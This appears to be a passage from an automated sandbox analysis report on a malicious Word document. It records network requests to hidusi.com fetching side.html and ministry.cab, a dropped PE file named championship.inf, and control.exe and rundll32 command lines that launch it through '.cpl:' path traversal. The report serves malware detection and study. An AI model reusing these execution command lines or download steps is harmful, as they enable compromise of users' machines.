Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://officeapps.live.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://onedrive.live.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://osi.office.net
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://outlook.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://outlook.office.com/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://outlook.office365.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://roaming.edog.
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://settings.outlook.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://tasks.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: ministry[1].cab.0.dr String found in binary or memory: https://www.openssl.org/docs/faq.html
Source: unknown DNS traffic detected: queries for: hidusi.com
Source: global traffic HTTP traffic detected: GET /e8c76295a5f9acb7/side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: hidusi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e8c76295a5f9acb7/side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: hidusi.comIf-Modified-Since: Wed, 01 Sep 2021 12:29:06 GMTIf-None-Match: "18f1-5caee365a20d1-gzip"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e8c76295a5f9acb7/ministry.cab HTTP/1.1Accept: */*Referer: http://hidusi.com/e8c76295a5f9acb7/side.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hidusi.comConnection: Keep-Alive

System Summary:

barindex
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\championship.inf Jump to dropped file
Tries to load missing DLLs
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Section loaded: sfc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:../../../AppData/Local/Temp/championship.inf',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:../../../../AppData/Local/Temp/Low/championship.inf',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:../../../../AppData/Local/Temp/championship.inf',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:../../../AppData/Local/Temp/championship.inf',
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:123', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:../../../AppData/Local/Temp/Low/championship.inf', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:../../../AppData/Local/Temp/championship.inf', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:../../../../AppData/Local/Temp/Low/championship.inf', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe 'C:\Windows\System32\control.exe' '.cpl:../../../../AppData/Local/Temp/championship.inf', Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:../../../AppData/Local/Temp/championship.inf',
Source: C:\Windows\SysWOW64\control.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\control.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\control.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{456C004B-C94D-4F20-AF14-ABC04DC179A8} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini Jump to behavior
Source: classification engine Classification label: mal72.expl.winDOCX@77/22@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Persistence and Installation Behavior:

barindex
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\championship.inf Jump to dropped file
Drops PE files
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\championship.inf Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
